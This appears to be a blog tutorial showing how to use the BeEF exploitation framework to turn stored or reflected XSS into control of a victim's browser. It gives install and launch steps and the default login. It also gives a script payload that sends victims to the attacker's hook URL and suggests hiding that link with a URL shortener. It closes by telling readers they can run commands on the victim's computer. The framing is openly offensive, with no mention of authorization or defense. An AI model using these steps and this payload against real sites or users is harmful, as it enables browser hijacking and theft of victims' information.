Exploiting XSS for Full System Access: Beef Exploitation Framework

Hi,

Today we will discuss that how we can exploit XSS for full system access or for running command on a victim computer.

Their are two main types of XSS reflected and stored.

Stored XSS means where we can store XSS vector permanently on server such as in database or message forums. Then the malicious script is executed when user tries to retrieve the information.


Reflected XSS  are those where the injected script is reflected off the web server, such as in an error message, search result. Reflected attacks are delivered to victims via some other methods, such as in an e-mail message, or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server.

Lets start exploiting it.

In the exploitation we will use the a tools which comes is Major linux distribution know as BEEF exploitation framework.

If this tools is not currently installed on your system give this command in terminal to install it 

>>>sudo apt-get install beef

It will install it in seconds and then you are ready to exploiting the XSS.
Now start beef exploitation framework UI in your browser. You can easily type beef in your terminal to know where the UI is situated but if you can do this you have and alternate option beef framework always works on port no 3000 so just check your ip address with command 
>>> ifconfig

copy the ip address and visit this link 
Your_Ip_address:3000/ui/panel


Now it will take you to the login panel of beef framework it will look like this


Default Username:Password is beef:beef

Now login to this and it will take to to this page

here click where i located with small arrow mark 
it will take to the url like this 
Your_ip_add:3000/demos/butcher/index.html

copy this and create a XSS vector like this 
<script>window.location="YoUr_url"</script>

Now Store this XSS vector or if you are exploiting the reflected XSS then short the whole url using any url shorten service like bit.ly 


After storing the XSS or in reflected when user click the XSS vector link 
It will show you his ip address the many information about his browser and pc 
like this 







Now click on the command portion and you can run command on victim computer


Now you can do what you want 





Hope You enjoyed this post this post if you have any suggestion please let me know
fell free to comment


Thanks 
Jitendra K Singh and Sooraj Shekhar




Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!

0 comments: